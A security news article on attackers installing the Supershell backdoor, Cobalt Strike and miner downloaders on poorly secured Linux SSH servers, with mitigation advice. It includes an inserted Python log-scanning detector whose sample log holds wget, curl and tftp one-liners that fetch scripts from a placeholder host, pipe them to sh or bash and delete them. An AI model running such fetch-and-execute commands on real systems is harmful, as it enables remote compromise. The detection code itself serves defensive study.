Wednesday, January 15, 2025

Hackers Using Supershell Malware To Attack Linux SSH Servers


Researchers identified an attack campaign targeting poorly secured Linux SSH servers. The attack leverages Supershell, a cross-platform reverse shell backdoor written in Go, which grants attackers remote control of compromised systems.

Following the initial infection, attackers are suspected to have deployed scanners to identify additional vulnerable targets and then likely launched dictionary attacks on these targets using credentials harvested from the compromised systems.  

 GitHub page of Supershell

The data reveals a list of threat actor IP addresses and their corresponding root credentials, including common passwords like “root/password” and “root/123456789,” which are frequently exploited by attackers to gain unauthorized access to vulnerable systems.


The presence of these credentials on compromised devices indicates a significant security risk, as they can be used to execute malicious activities, steal sensitive information, and disrupt operations. 

The identification and mitigation of these vulnerabilities are crucial to protecting systems from potential threats.

The threat actor used various methods to download and execute malicious scripts after compromising a system. 

An attacker leveraged wget, curl, tftp, and ftpget commands to download scripts from different sources, including web servers, FTP servers, and even non-standard ports. 

Obfuscated Supershell

The downloaded scripts were then executed using shell commands (sh, bash), granting the attacker remote access and potentially installing additional malware. The attackers then attempted to remove traces of the attack by deleting the downloaded scripts and other files.
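The download, execute, delete sequence described above can be hunted for in shell command logs. The following Python sketch is an added example, not code from ASEC or the original article; the sample command lines, the 192.0.2.10 address, the busybox handling and the function names are constructed assumptions for illustration.

```python
import re
import shlex

DOWNLOADERS = {"wget", "curl", "tftp", "ftpget"}   # tools named in the article
SHELLS = {"sh", "bash"}                             # interpreters named in the article
SEPARATORS = re.compile(r"\s*(?:;|&&|\|\||\|)\s*")  # ; && || | between commands

def classify(command_line):
    """Return the ordered attack-chain stages seen in one logged command line."""
    stages = []
    for part in SEPARATORS.split(command_line):
        try:
            argv = shlex.split(part)
        except ValueError:            # unbalanced quotes: fall back to whitespace
            argv = part.split()
        if argv and argv[0].endswith("busybox"):
            argv = argv[1:]           # assumption: "busybox wget ..." -> "wget ..."
        if not argv:
            continue
        tool = argv[0].rsplit("/", 1)[-1]   # /usr/bin/wget -> wget
        if tool in DOWNLOADERS:
            stages.append("download")
        elif tool in SHELLS and "download" in stages:
            stages.append("execute")
        elif tool == "rm" and "execute" in stages:
            stages.append("cleanup")
    return stages

def suspicious(lines):
    """Return (line_number, stages) for lines that download and then execute."""
    hits = []
    for number, line in enumerate(lines, 1):
        stages = classify(line)
        if "execute" in stages:       # execute is only recorded after a download
            hits.append((number, stages))
    return hits

# Constructed sample command log; 192.0.2.10 is a documentation-only address.
SAMPLE = [
    "cd /tmp; wget http://192.0.2.10:8080/x.sh; sh x.sh; rm -f x.sh",
    "curl -s http://192.0.2.10/y.sh | bash",
    "wget https://example.org/release.tar.gz",
    "bash /opt/backup/run.sh && rm /tmp/backup.lock",
    "tftp -g -r z.sh 192.0.2.10 && /bin/sh z.sh && rm z.sh",
]

if __name__ == "__main__":
    for number, stages in suspicious(SAMPLE):
        print(f"line {number}: {' -> '.join(stages)}")
```

The check works per logged line, so a download and its execution recorded as separate entries need to be grouped by session before being passed in.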

An attacker initially installed the obfuscated Supershell backdoor on a poorly managed Linux system. The backdoor, identified as Supershell by its internal strings, behavior, and execution logs, provides the attacker with remote control capabilities.

While the primary goal seems to be control hijacking, there’s a possibility that the attacker also intends to install a cryptocurrency miner, like XMRig, to exploit the system’s resources for personal gain, which aligns with common attack patterns targeting vulnerable Linux systems.

Log showing Supershell’s execution

Threat actors are exploiting poorly managed Linux SSH servers by installing the Supershell backdoor, which enables remote control of infected systems, potentially leading to data theft, system compromise, and other malicious activities. 

According to ASEC, to mitigate this threat, administrators should prioritize strong password hygiene, regular updates, and robust security measures like firewalls. 

Additionally, ensuring that V3 is up-to-date is crucial to prevent malware infections. By implementing these countermeasures, organizations can significantly reduce their vulnerability to Supershell attacks.

The detected malware includes a Cobalt Strike backdoor, a shell agent downloader, and an ElfMiner downloader. The backdoor, identified as Backdoor/Linux.CobaltStrike.3753120, was likely deployed for remote access and control.

The shell agent downloader, Downloader/Shell.Agent.SC203780, was designed to download and execute additional malicious payloads.

The ElfMiner downloader, Downloader/Shell.ElfMiner.S1705, was likely used to download and install cryptocurrency mining malware.


Varshini
Varshini is a Cyber Security expert in Threat Analysis, Vulnerability Assessment, and Research. Passionate about staying ahead of emerging Threats and Technologies.
